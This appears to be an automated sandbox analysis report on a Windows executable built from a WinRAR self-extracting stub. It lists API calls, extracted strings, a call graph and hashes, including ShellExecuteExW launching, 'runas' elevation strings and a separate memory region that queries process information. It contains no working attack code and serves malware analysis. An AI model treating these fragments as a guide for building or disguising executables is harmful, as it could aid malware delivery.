41834 50f048 UnhandledExceptionFilter ___scrt_uninitialize_crt 41780->41834 41784 50eee0 41783->41784 41786 50eef5 ___scrt_uninitialize_crt 41784->41786 41837 518977 41784->41837 41786->41758 41789 518b04 41787->41789 41788 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41790 50f408 41788->41790 41789->41788 41790->41769 41791 518a91 41790->41791 41792 518ac0 41791->41792 41793 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41792->41793 41794 518ae9 41793->41794 41794->41774 41795->41775 41844 500863 41796->41844 41798 50df2e 41859 50ac16 41798->41859 41800 50df46 _abort 41807 50dfbc 41800->41807 41864 50c5c4 41800->41864 41803 50dfe0 41869 50dbde 41803->41869 41873 4f4092 41807->41873 41808 50df76 __InternalCxxFrameHandler 41808->41807 41809 50dbde SetEnvironmentVariableW 41808->41809 41809->41807 41814 50e098 41898 5090b7 41814->41898 41817 5090b7 UnhandledExceptionFilter 41818 50e0aa DialogBoxParamW 41817->41818 41819 50e0e4 41818->41819 41822 50e10b 41819->41822 41904 50ae2f SetCurrentDirectoryW _abort _wcslen 41819->41904 41821 50e12a DeleteObject 41823 50e146 41821->41823 41824 50e13f DeleteObject 41821->41824 41822->41821 41825 50e17d 41823->41825 41905 50dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 41823->41905 41824->41823 41901 50ac7c 41825->41901 41828 50e1c3 41828->41778 42096 517cd5 41829->42096 41832->41772 41833->41780 41834->41769 41835->41761 41840 51c05a 41837->41840 41843 51c073 41840->41843 41841 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41842 518986 41841->41842 41842->41786 41843->41841 41846 50086d 41844->41846 41847 500b54 41846->41847 41906 5175fb 5 API calls 2 library calls 41846->41906 41848 500c94 GetFileAttributesW 41847->41848 41849 500cac 41847->41849 41848->41847 41848->41849 41850 500d73 41849->41850 41852 500d0d 41849->41852 41858 500d5e _wcslen 41849->41858 41851 4f4092 _swprintf 5 API 
calls 41850->41851 41851->41858 41907 4fe617 41852->41907 41855 4f4092 _swprintf 5 API calls 41856 500d4f 41855->41856 41857 4fe617 7 API calls 41856->41857 41857->41858 41858->41798 41931 50081b 41859->41931 41861 50ac2a OleInitialize 41862 50ac4d 41861->41862 41863 50ac6b SHGetMalloc 41862->41863 41863->41800 41868 50c5ce 41864->41868 41865 50c6e4 41865->41803 41865->41808 41867 501fac CharUpperW 41867->41868 41868->41865 41868->41867 41933 4ff3fa 23 API calls 2 library calls 41868->41933 41871 50dbeb 41869->41871 41870 50dc36 41870->41807 41871->41870 41872 50dc2a SetEnvironmentVariableW 41871->41872 41872->41870 41934 4f4065 41873->41934 41876 50b6dd LoadBitmapW 41877 50b70b GetObjectW 41876->41877 41878 50b6fe 41876->41878 41880 50b71a 41877->41880 41968 50a6c2 41878->41968 41963 50a5c6 41880->41963 41881 50b705 41881->41877 41881->41880 41884 50b770 41895 4fda42 41884->41895 41885 50b74c 41974 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41885->41974 41887 50a6c2 2 API calls 41889 50b73d 41887->41889 41888 50b754 41975 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41888->41975 41889->41885 41891 50b743 DeleteObject 41889->41891 41891->41885 41892 50b75d 41976 50a80c 8 API calls 41892->41976 41894 50b764 DeleteObject 41894->41884 41981 4fda67 41895->41981 41897 4fda4e 41897->41814 42091 50eb38 41898->42091 41900 5090d6 41900->41817 41902 50acab 41901->41902 41903 50acb5 OleUninitialize 41902->41903 41903->41828 41904->41822 41905->41825 41906->41847 41908 4fe627 41907->41908 41911 4fe648 41908->41911 41917 4fd9b0 41911->41917 41914 4fe66b LoadStringW 41915 4fe645 41914->41915 41916 4fe682 LoadStringW 41914->41916 41915->41855 41916->41915 41922 4fd8ec 41917->41922 41919 4fd9cd 41920 4fd9e2 41919->41920 41928 4fd9f0 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 41919->41928 41920->41914 41920->41915 41923 4fd904 41922->41923 41927 4fd984 _strncpy 41922->41927 41926 4fd959 41923->41926 41929 4fe5b1 5 API calls __vsnprintf 41923->41929 
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050B7E5
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050B8D1
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B8EF
                                      • IsDialogMessageW.USER32(?,?), ref: 0050B902
                                      • TranslateMessage.USER32(?), ref: 0050B910
                                      • DispatchMessageW.USER32(?), ref: 0050B91A
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0050B93D
                                      • EndDialog.USER32(?,00000001), ref: 0050B960
                                      • GetDlgItem.USER32(?,00000068), ref: 0050B983
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050B99E
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050B9B1
                                        • Part of subcall function 0050D453: _wcschr.LIBVCRUNTIME ref: 0050D45C
                                        • Part of subcall function 0050D453: _wcslen.LIBCMT ref: 0050D47D
                                      • SetFocus.USER32(00000000), ref: 0050B9B8
                                      • _swprintf.LIBCMT ref: 0050BA24
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                        • Part of subcall function 0050D4D4: GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                        • Part of subcall function 0050D4D4: ShowWindow.USER32(00000000,00000005,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000456,00000000,00531098), ref: 0050D510
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                        • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                      • _swprintf.LIBCMT ref: 0050BAC2
                                      • _swprintf.LIBCMT ref: 0050BB7C
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0050BC6F
                                      • _swprintf.LIBCMT ref: 0050BD1E
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BD7D
                                      • SetDlgItemTextW.USER32(?,00000065,005235F4), ref: 0050BD94
                                      • GetDlgItem.USER32(?,00000065), ref: 0050BD9D
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0050BDAC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0050BDBB
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050BE68
                                      • _wcslen.LIBCMT ref: 0050BEBE
                                      • _swprintf.LIBCMT ref: 0050BEE8
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050BF32
                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0050BF4C
                                      • GetDlgItem.USER32(?,00000068), ref: 0050BF55
                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0050BF6B
                                      • GetDlgItem.USER32(?,00000066), ref: 0050BF85
                                      • SetWindowTextW.USER32(00000000,0053A472), ref: 0050BFA7
                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0050C007
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C01A
                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0050C0BD
                                      • EnableWindow.USER32(00000000,00000000), ref: 0050C197
                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0050C1D9
                                        • Part of subcall function 0050C73F: __EH_prolog.LIBCMT ref: 0050C744
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050C1FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate__vswprintf_c_l_wcschr
                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDv<P$STARTDLG$^P$__tmp_rar_sfx_access_check_%u$hP$runas$winrarsfxmappingfile.tmp
                                      • API String ID: 1533452614-19397719
                                      • Opcode ID: 72cca35c94f1cc0976d0be40e28289ef57c826fb8bf2007d9e510a07405e5ee2
                                      • Instruction ID: 94db0e6e9d0a0cffe48a28a0f0cde039ccc5b096f5dfcec76c316acbe6c194cb
                                      • Opcode Fuzzy Hash: 72cca35c94f1cc0976d0be40e28289ef57c826fb8bf2007d9e510a07405e5ee2
                                      • Instruction Fuzzy Hash: E542E670944349BAFB219BB09C8EFBE3F6CBB22704F000155F644A61E2CB795E48DB25

                                      APIs
                                        • Part of subcall function 0050AC16: OleInitialize.OLE32(00000000), ref: 0050AC2F
                                        • Part of subcall function 0050AC16: SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                      • _swprintf.LIBCMT ref: 0050E048
                                      • LoadIconW.USER32(00000000,00000064), ref: 0050E078
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0050E0C9
                                      • DeleteObject.GDI32 ref: 0050E130
                                      • DeleteObject.GDI32(?), ref: 0050E140
                                        • Part of subcall function 0050DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0050DC30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DeleteObject$DialogEnvironmentIconInitializeLoadMallocParamVariable_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzT
                                      • API String ID: 730176925-793314549
                                      • Opcode ID: 715ff0361537609d0f98be33efa51365a0e92bccb1882c1449b2cb93c41022e6
                                      • Instruction ID: 217b6390b1e001fa7c7c786d6c3cdd151a61110a6f28ff89035e33dc44464f0a
                                      • Opcode Fuzzy Hash: 715ff0361537609d0f98be33efa51365a0e92bccb1882c1449b2cb93c41022e6
                                      • Instruction Fuzzy Hash: B361C671904345ABD320AB75EC4EF6F7FA8FFA6704F000429F545922E1EB789948D761

                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileFindFirst$_wcslen
                                      • String ID:
                                      • API String ID: 1818217402-0
                                      • Opcode ID: d97782d52b438650ad03c72f8bfac412c25e627de7c1c6d398fd80bf0bbe98d7
                                      • Instruction ID: bc243ea7983c825a14c382de21db1a9f4c67d3cbe909b3384c66b42fe0b4db73
                                      • Opcode Fuzzy Hash: d97782d52b438650ad03c72f8bfac412c25e627de7c1c6d398fd80bf0bbe98d7
                                      • Instruction Fuzzy Hash: EC418372500519ABC725EF64CC88AEEB7B8FF48350F104196E95DD3240D738AEA5CF95
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04AE686F
                                      • GetSystemInfo.KERNELBASE(?), ref: 04AE6881
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID: InfoInformationProcessQuerySystem
                                      • String ID:
                                      • API String ID: 1993426926-0
                                      • Opcode ID: 6ca4d8e22a42c68bcc25d9eb2e803cf2c6eac377ad07fdece4ea93206e43b3d4
                                      • Instruction ID: 220df0cbf321344648a0a82c3a5146d99b637a5185753977fd1e4c75c29d3826
                                      • Opcode Fuzzy Hash: 6ca4d8e22a42c68bcc25d9eb2e803cf2c6eac377ad07fdece4ea93206e43b3d4
                                      • Instruction Fuzzy Hash: 87F01C7660021DABCB04DFA9DC45EDEBFB8EB09750B008019FD06D7250DB309900CBE0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 47cbe6a4f4952cad57c4eaec9567a1fd68499a99b4f4d356660dca66956b53a5
                                      • Instruction ID: e428ce387d56033045e0c217d1cb12ca0ae52bc1c4c68608dd920dbd9fd224a7
                                      • Opcode Fuzzy Hash: 47cbe6a4f4952cad57c4eaec9567a1fd68499a99b4f4d356660dca66956b53a5
                                      • Instruction Fuzzy Hash: D0821B7090414DAEDF15DB60C895BFBBBB9AF05304F0841BFEA499F242CB385A84C769
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80b9b88425a003413ec7d23cd5ae67585516dc15a48fec49513479e37bd6e823
                                      • Instruction ID: 9b9fae30690265e74fa127e3df547d916863e91622b5a164321b6e7327847502
                                      • Opcode Fuzzy Hash: 80b9b88425a003413ec7d23cd5ae67585516dc15a48fec49513479e37bd6e823
                                      • Instruction Fuzzy Hash: 95E04F31000148ABDF11BF24DD4E9893FBDFF59341F004494F8058A132CB39DEA6DA90

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,|<R,00000800,?,00000000,?,00000800), ref: 00500C9C
                                      • _swprintf.LIBCMT ref: 00500D4A
                                      • _swprintf.LIBCMT ref: 00500D96
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _wcslen.LIBCMT ref: 00500DC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _swprintf$AttributesFile__vswprintf_c_l_wcslen
                                      • String ID: ,<R$D=R$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<R
                                      • API String ID: 2834821262-3884279378
                                      • Opcode ID: 4db60e475fb5a02b6943e2c2d5fe24c76e80c98331b81d1fd3c8814b85b99301
                                      • Instruction ID: ea604e2d52b9acb2c13dda6c019fedaa3ed738a6be72b6a33fe87391f8c7c9bd
                                      • Opcode Fuzzy Hash: 4db60e475fb5a02b6943e2c2d5fe24c76e80c98331b81d1fd3c8814b85b99301
                                      • Instruction Fuzzy Hash: 54D160B1108394ABD3309F50E94DB9FBEE8BF86704F50491DF289961D0DB788A49CF62

                                      Control-flow Graph

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050C744
                                        • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                      • _wcslen.LIBCMT ref: 0050CA0A
                                      • _wcslen.LIBCMT ref: 0050CA13
                                      • SetWindowTextW.USER32(?,?), ref: 0050CA71
                                      • _wcslen.LIBCMT ref: 0050CAB3
                                      • _wcsrchr.LIBVCRUNTIME ref: 0050CBFB
                                      • GetDlgItem.USER32(?,00000066), ref: 0050CC36
                                      • SetWindowTextW.USER32(00000000,?), ref: 0050CC46
                                      • SendMessageW.USER32(00000000,00000143,00000000,0053A472), ref: 0050CC54
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0050CC7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$<P$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$P
                                      • API String ID: 3356938749-2014984662
                                      • Opcode ID: ed85cf7ab5aeec706a2081d5e89f42cfec05520bd1d4b2cd5522edf611a6c2d6
                                      • Instruction ID: 535dea0b03490816b3da9c625ad2c79353d73512c1f5388b0e8cd466472a4505
                                      • Opcode Fuzzy Hash: ed85cf7ab5aeec706a2081d5e89f42cfec05520bd1d4b2cd5522edf611a6c2d6
                                      • Instruction Fuzzy Hash: 13E17972900219AADF24DBA4DC85EEE7BBCBF45350F4445A5F609E7090EB749F848F60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004FDA70
                                      • _wcschr.LIBVCRUNTIME ref: 004FDA91
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                      • _wcslen.LIBCMT ref: 004FDDE9
                                      • __fprintf_l.LIBCMT ref: 004FDF1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                      • API String ID: 1810648836-2415259559
                                      • Opcode ID: 425ff814532e896ebf4b28099aa0daeb315dfe0f964e29a516e6a416a26ea4c4
                                      • Instruction ID: fc5b2181501d061cb81f69956ff862f253c783fce73fbb14dc474d9600f5c338
                                      • Opcode Fuzzy Hash: 425ff814532e896ebf4b28099aa0daeb315dfe0f964e29a516e6a416a26ea4c4
                                      • Instruction Fuzzy Hash: B732F07190021DABDB24EF69C845BFE7BA5FF45300F00016BFA0597291EBB99D85CB58

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      • GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                      • ShowWindow.USER32(00000000,00000005,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000456,00000000,00531098), ref: 0050D510
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                      • Instruction ID: 25e6efa4aa6eaf14944ff231f04f83cb917f70e59cf08673dea4b69fc4c03b36
                                      • Opcode Fuzzy Hash: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                      • Instruction Fuzzy Hash: A231E171145742ABE301DF20EC5AFAF7FACEBA2359F000508F555962E0EB648B089B76

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ShowWindow$ExecuteShell_wcslen
                                      • String ID: .exe$.inf$Install$PDv<P$hP$rP
                                      • API String ID: 855908426-825748556
                                      • Opcode ID: e3c3b19439d2631ce975fbd1441adea627222bb5a48549fe3dea5a5d0d8759ed
                                      • Instruction ID: 68e979a31c28d322696c044b69f1b73f39b26b529d852479b268dc040682d4db
                                      • Opcode Fuzzy Hash: e3c3b19439d2631ce975fbd1441adea627222bb5a48549fe3dea5a5d0d8759ed
                                      • Instruction Fuzzy Hash: C151CE744083849AEB309BA49844BAFBFF4BF92744F04481EF9C4971E1E7718988DB72

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 933 50abab-50abca GetClassNameW 934 50abf2-50abf4 933->934 935 50abcc-50abe1 call 501fbb 933->935 937 50abf6-50abf8 934->937 938 50abff-50ac01 934->938 940 50abf1 935->940 941 50abe3-50abef FindWindowExW 935->941 937->938 940->934 941->940
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 0050ABC2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0050ABE9
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0050ABF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AutoClassCompleteFindNameWindow
                                      • String ID: @UJu$EDIT
                                      • API String ID: 1162832696-1013725496
                                      • Opcode ID: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                      • Instruction ID: 731202ac02d571cd38ac057efb8d897b137ef200eccee2878db56e1e16242f56
                                      • Opcode Fuzzy Hash: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                      • Instruction Fuzzy Hash: B4F0A73270032977DB2057249C0EFDF7AACAF46B51F484011BA05F31D0D760DE4995B6

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 942 50b568-50b581 PeekMessageW 943 50b583-50b597 GetMessageW 942->943 944 50b5bc-50b5be 942->944 945 50b5a8-50b5b6 TranslateMessage DispatchMessageW 943->945 946 50b599-50b5a6 IsDialogMessageW 943->946 945->944 946->944 946->945
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                      • IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                      • TranslateMessage.USER32(?), ref: 0050B5AC
                                      • DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                      • Instruction ID: 460f73148a31ef5d3a175802d1d51d0c30a17404ade6b5202561a30917fc65d3
                                      • Opcode Fuzzy Hash: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                      • Instruction Fuzzy Hash: 9CF0BD71A0131AABDB209BE5DC5CDDF7FBCEE153917004415B509D20A0EB74D609DBB0

                                      Control-flow Graph

                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0050AC2F
                                      • SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: InitializeMalloc
                                      • String ID: riched20.dll
                                      • API String ID: 48681180-3360196438

                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0050DC30
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439

                                      Similarity
                                      • API ID: __freea
                                      • String ID:
                                      • API String ID: 240046367-0

                                      APIs
                                      • GlobalAlloc.KERNELBASE(00000002,00000000), ref: 0050A72D
